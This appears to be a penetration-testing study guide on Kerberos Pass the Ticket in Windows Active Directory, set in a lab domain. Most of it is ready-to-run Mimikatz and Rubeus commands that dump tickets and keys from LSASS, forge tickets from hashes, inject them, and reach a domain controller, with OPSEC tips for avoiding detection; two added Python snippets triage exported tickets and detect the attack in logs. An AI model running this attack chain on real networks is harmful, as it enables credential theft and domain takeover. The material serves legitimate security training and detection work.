
# Pass the Ticket from Windows (PtT)

## Pass the Ticket (PtT) — Windows

### What is PtT?

Pass the Ticket is a lateral movement technique in Active Directory where you steal or forge a **Kerberos ticket** and inject it into a session to authenticate as another user — without ever knowing their password.

> PtH uses NTLM hashes. PtT uses Kerberos tickets. Different protocol, same goal: impersonation.

***

### Kerberos Refresher

| Ticket                            | What it does                                                                      |
| --------------------------------- | --------------------------------------------------------------------------------- |
| **TGT** (Ticket Granting Ticket)  | Master ticket. Used to request service tickets. Issued by KDC after initial auth. |
| **TGS** (Ticket Granting Service) | Service-specific ticket. Proves identity to one service (e.g. MSSQL, CIFS, LDAP). |

**Flow:**

1. User authenticates to the DC → proves knowledge of the password by encrypting a timestamp with the key derived from it (the NT hash for RC4, an AES key for AES)
2. DC validates the timestamp → issues a TGT
3. User presents the TGT to the KDC → gets a TGS for a specific service
4. User presents the TGS to the service → access granted

**Where tickets live on Windows:** inside the **LSASS** process.

* Non-admin = only the tickets of your own logon session
* Local admin = every ticket cached on the machine, across all logon sessions

***

### Reading .kirbi Filenames

```
[0;84de2]-2-0-40e10000-julio@krbtgt-INLANEFREIGHT.HTB.kirbi
```

| Part                | Meaning                         |
| ------------------- | ------------------------------- |
| `[0;84de2]`         | LUID (Logon session ID)         |
| `-2-0-`             | Mimikatz ticket group (2 = TGT group) and index within it |
| `julio`             | The user this ticket belongs to |
| `krbtgt`            | Service = this is a **TGT**     |
| `INLANEFREIGHT.HTB` | Domain                          |

**Rules:**

* Filename with `$` → machine account ticket (e.g. `MS01$`) → skip
* Filename with `krbtgt` → TGT → most powerful
* Filename with service name (`cifs`, `ldap`, `mssql`) → TGS → service-specific only

**Why you want a human user's TGT and not machine tickets:**

| Ticket Type       | Reason to Skip                                              |
| ----------------- | ----------------------------------------------------------- |
| `MS01$@krbtgt`    | You're already on MS01. Machine account. Useless.           |
| `MS01$@cifs-DC01` | TGS only works for CIFS. Locked to machine identity.        |
| `MS01$@LDAP-DC01` | TGS only works for LDAP. Same issue.                        |
| `julio@krbtgt` ✅  | Human user TGT. Can request any TGS. Full lateral movement. |
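The filename rules above, as an added Python helper that is not part of the original page: it parses the Mimikatz export filename layout and classifies each ticket, the way an incident responder triages a directory of `.kirbi` files left on a compromised host to learn which human accounts' TGTs were exposed. The 8-hex-digit field the table leaves out (`40e10000`) is the ticket's TicketFlags; the bit names follow RFC 4120 (plus `name_canonicalize` from RFC 6806), and the sample filenames are constructed.

```python
import re
from dataclasses import dataclass

# Filename layout written by sekurlsa::tickets /export (group/index are Mimikatz numbering,
# flags is the ticket's TicketFlags in hex):  [<LUID>]-<group>-<index>-<flags>-<client>@<service>-<target>.kirbi
KIRBI_RE = re.compile(
    r"^\[(?P<luid>[^\]]+)\]-(?P<group>\d+)-(?P<index>\d+)-(?P<flags>[0-9a-fA-F]{8})"
    r"-(?P<client>[^@]+)@(?P<service>[^-]+)-(?P<target>.+)\.kirbi$"
)

# TicketFlags bit names (RFC 4120, plus the RFC 6806 name-canonicalize bit), MSB first.
TICKET_FLAGS = {
    0x40000000: "forwardable", 0x20000000: "forwarded", 0x10000000: "proxiable", 0x08000000: "proxy",
    0x02000000: "postdated", 0x00800000: "renewable", 0x00400000: "initial",
    0x00200000: "pre_authent", 0x00040000: "ok_as_delegate", 0x00010000: "name_canonicalize",
}

@dataclass
class KirbiInfo:
    luid: str
    client: str
    service: str
    target: str
    flags: list
    kind: str  # user-tgt | user-tgs | machine-tgt | machine-tgs

def parse_kirbi_name(name: str) -> KirbiInfo:
    """Classify one exported ticket from its filename alone; no ticket bytes are read."""
    m = KIRBI_RE.match(name)
    if not m:
        raise ValueError(f"not a Mimikatz .kirbi filename: {name}")
    bits = int(m["flags"], 16)
    flags = [label for bit, label in TICKET_FLAGS.items() if bits & bit]
    owner = "machine" if m["client"].endswith("$") else "user"     # MS01$ -> machine account
    ticket = "tgt" if m["service"].lower() == "krbtgt" else "tgs"  # krbtgt -> TGT, else service ticket
    return KirbiInfo(m["luid"], m["client"], m["service"], m["target"], flags, f"{owner}-{ticket}")

def exposed_users(names):
    """Human accounts whose TGT was exported: treat them as compromised (reset password, purge tickets)."""
    infos = [parse_kirbi_name(n) for n in names]
    return sorted({i.client for i in infos if i.kind == "user-tgt"})

# Constructed sample export directory listing, mirroring the page's examples.
SAMPLE_EXPORT = [
    "[0;84de2]-2-0-40e10000-julio@krbtgt-INLANEFREIGHT.HTB.kirbi",
    "[0;3e7]-2-0-40e10000-MS01$@krbtgt-INLANEFREIGHT.HTB.kirbi",
    "[0;3e7]-0-1-40a50000-MS01$@cifs-DC01.inlanefreight.htb.kirbi",
]
```

`0x40e10000` decodes to forwardable, renewable, initial, pre_authent and name_canonicalize, exactly the flag set of a freshly issued TGT, which is a second way to confirm the `krbtgt` classification.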

***

### Stage 1 — Harvest Tickets

#### Mimikatz — Export to .kirbi files (needs admin)

```cmd
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export
```

Saves one `.kirbi` file per cached ticket to the current directory.

```cmd
dir *.kirbi
```

> ⚠️ Bug: Mimikatz `2.2.0 20220919` on some Windows 10 builds exports broken tickets via `sekurlsa::tickets`. Use Rubeus instead in that case.

#### Rubeus — Export as Base64 (needs admin)

```cmd
Rubeus.exe dump /nowrap
```

Prints all tickets as Base64 in terminal. `/nowrap` keeps it on one line for easy copy-paste.

***

### Stage 2 — OverPass the Hash (Pass the Key)

Convert a **hash or key** directly into a **TGT** — no password needed.

#### Step 1: Dump Kerberos keys with Mimikatz

```cmd
mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys
```

Output gives you all key types:

```
aes256_hmac       b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60
rc4_hmac_nt       3f74aa8f08f712f09cd5177b5c1ce50f
```

#### Step 2a: Forge TGT with Mimikatz (needs admin)

```cmd
mimikatz # sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f
```

Opens a new `cmd.exe` window running in the context of that user.

#### Step 2b: Forge TGT with Rubeus (no admin needed)

```cmd
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /aes256:b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 /nowrap
```

Returns a Base64 TGT you can inject later.

> ✅ Rubeus does **not** require admin for this step. Mimikatz does.

> ⚠️ **OPSEC:** Using `rc4_hmac` (NTLM hash) on modern domains (2008+ functional level) triggers an **encryption downgrade alert**. Use `aes256` whenever you have it.

***

### Stage 3 — Inject the Ticket (Actual PtT)

#### Method 1: Rubeus `/ptt` flag (inject on the fly)

```cmd
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /ptt
```

Requests a TGT and immediately injects it into the current logon session.

Output confirms: `[+] Ticket successfully imported!`

#### Method 2: Rubeus — inject from .kirbi file

```cmd
Rubeus.exe ptt /ticket:[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi
```

#### Method 3: Rubeus — inject from Base64 string

```cmd
Rubeus.exe ptt /ticket:doIE1jCCBNKgAwIBBaED...
```

#### Method 4: Mimikatz — inject from .kirbi file

```cmd
mimikatz # kerberos::ptt "C:\Users\plaintext\Desktop\[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"
```

Then exit Mimikatz — the ticket persists in your cmd session.

#### Convert .kirbi to Base64 (PowerShell)

```powershell
[Convert]::ToBase64String([IO.File]::ReadAllBytes("[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"))
```

***

### Stage 4 — Lateral Movement

#### Verify access after ticket injection

```cmd
dir \\DC01.inlanefreight.htb\c$
```

If the ticket works, the directory listing comes back with no password prompt.

***

#### Method A — Mimikatz → PowerShell Remoting

```cmd
C:\tools> mimikatz.exe
mimikatz # privilege::debug
mimikatz # kerberos::ptt "C:\Users\Administrator.WIN01\Desktop\[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"
mimikatz # exit

C:\tools> powershell
PS C:\tools> Enter-PSSession -ComputerName DC01
[DC01]: PS C:\Users\john\Documents> whoami
inlanefreight\john
```

> Note: You can also use `misc::cmd` inside Mimikatz to spawn a new cmd window with the ticket already loaded instead of exiting.

***

#### Method B — Rubeus `createnetonly` → PowerShell Remoting (cleaner OPSEC)

**Step 1:** Create a sacrificial logon session

```cmd
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
```

Output:

```
[+] Process   : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 1556
[+] LUID      : 0xe07648
```

A new `cmd.exe` window opens (isolated, Logon Type 9 = network logon).

**Step 2:** In that new window, request TGT and inject

```cmd
Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256:9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc /ptt
```

**Step 3:** Connect via PowerShell Remoting

```cmd
powershell
PS C:\tools> Enter-PSSession -ComputerName DC01
[DC01]: PS C:\Users\john\Documents> whoami
inlanefreight\john
```

**Why `createnetonly` is better:**

* Creates an isolated logon session — doesn't overwrite existing TGTs in your current session
* Cleaner OPSEC
* Logon Type 9 = credentials aren't sent over network during session creation

***

### Tool Comparison

| Action              | Mimikatz                                     | Rubeus                                              |
| ------------------- | -------------------------------------------- | --------------------------------------------------- |
| Export tickets      | `sekurlsa::tickets /export` → `.kirbi` files | `dump /nowrap` → Base64                             |
| Dump Kerberos keys  | `sekurlsa::ekeys`                            | —                                                   |
| OverPass the Hash   | `sekurlsa::pth` (needs admin)                | `asktgt` (no admin needed)                          |
| Inject ticket       | `kerberos::ptt`                              | `/ptt` flag or `ptt` command                        |
| Sacrificial session | `misc::cmd`                                  | `createnetonly`                                     |
| PowerShell Remoting | Import ticket → `Enter-PSSession`            | `createnetonly` → `asktgt /ptt` → `Enter-PSSession` |

***

### OPSEC Notes

| Risk                                  | Detail                                                           |
| ------------------------------------- | ---------------------------------------------------------------- |
| RC4 downgrade alert                   | Using `rc4_hmac` on modern AD (2008+) is detectable. Use AES256. |
| Ticket injection into current session | Overwrites existing TGTs. Use `createnetonly` to avoid this.     |
| LSASS access                          | Both Mimikatz and Rubeus dump from LSASS — EDR will flag this.   |
| Admin required for harvesting         | Both tools need local admin to collect all tickets.              |
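The RC4 downgrade warning in Stage 2 and the OPSEC table above describe what the defender's logs record; as an added Python example (not from the page), this is the matching detection logic run over constructed Windows Security events: a 4768 TGT request with `TicketEncryptionType` `0x17` (RC4) for an account that is not a documented legacy exception, and a 4624 logon of type 9 (NewCredentials, the type `createnetonly` and `runas /netonly` produce) through the `seclogo` logon process. The event lines, account names and addresses are constructed; the field names follow the Windows event schema.

```python
# Constructed sample Security events as flat key=value lines; the field names follow the
# Windows event schema for 4768 (TGT requested) and 4624 (logon). All values are made up.
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=julio ServiceName=krbtgt TicketEncryptionType=0x12 PreAuthType=2 IpAddress=10.10.10.21",
    "EventID=4768 TargetUserName=plaintext ServiceName=krbtgt TicketEncryptionType=0x17 PreAuthType=2 IpAddress=10.10.10.50",
    "EventID=4624 TargetUserName=Administrator LogonType=2 LogonProcessName=User32 AuthenticationPackageName=Negotiate WorkstationName=WIN01",
    "EventID=4624 TargetUserName=Administrator LogonType=9 LogonProcessName=seclogo AuthenticationPackageName=Negotiate WorkstationName=WIN01",
    "EventID=4768 TargetUserName=LEGACY01$ ServiceName=krbtgt TicketEncryptionType=0x17 PreAuthType=2 IpAddress=10.10.10.9",
]

RC4_HMAC = "0x17"               # TicketEncryptionType for rc4_hmac; 0x11 / 0x12 are AES128 / AES256
RC4_ALLOWLIST = {"LEGACY01$"}   # accounts known to still need RC4 (documented exceptions only)

def parse_event(line):
    """Turn one key=value line into a dict."""
    return dict(field.split("=", 1) for field in line.split())

def detect(lines, rc4_allowlist=RC4_ALLOWLIST):
    """Return (rule, account, where) tuples for the two indicators, in event order."""
    alerts = []
    for ev in map(parse_event, lines):
        # Indicator 1: RC4-encrypted TGT request in an AES-capable domain (the downgrade the OPSEC note warns about).
        if (ev.get("EventID") == "4768" and ev.get("ServiceName") == "krbtgt"
                and ev.get("TicketEncryptionType") == RC4_HMAC
                and ev.get("TargetUserName") not in rc4_allowlist):
            alerts.append(("rc4-tgt-request", ev["TargetUserName"], ev.get("IpAddress", "?")))
        # Indicator 2: NewCredentials (type 9) logon via seclogo, as createnetonly / runas /netonly produce.
        if (ev.get("EventID") == "4624" and ev.get("LogonType") == "9"
                and ev.get("LogonProcessName", "").lower() == "seclogo"):
            alerts.append(("newcredentials-logon", ev["TargetUserName"], ev.get("WorkstationName", "?")))
    return alerts

if __name__ == "__main__":
    for rule, account, where in detect(SAMPLE_EVENTS):
        print(f"{rule:22s} account={account} from={where}")
```

Legitimate `runas /netonly` use fires the second rule too, so treat it as a triage signal to correlate with a following 4768/4769 from the same host rather than an alert on its own.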

***

### Quick Reference — Full Attack Chain

```
1. Get local admin on target machine
2. Harvest tickets:
   Rubeus.exe dump /nowrap
   OR
   mimikatz # sekurlsa::tickets /export

3. Identify human user TGT (not machine$, not TGS)

4. Inject ticket:
   Rubeus.exe ptt /ticket:<base64 or .kirbi>
   OR
   mimikatz # kerberos::ptt "path\to\ticket.kirbi"

5. Verify:
   dir \\DC01.inlanefreight.htb\c$

6. Move laterally:
   powershell → Enter-PSSession -ComputerName DC01
```
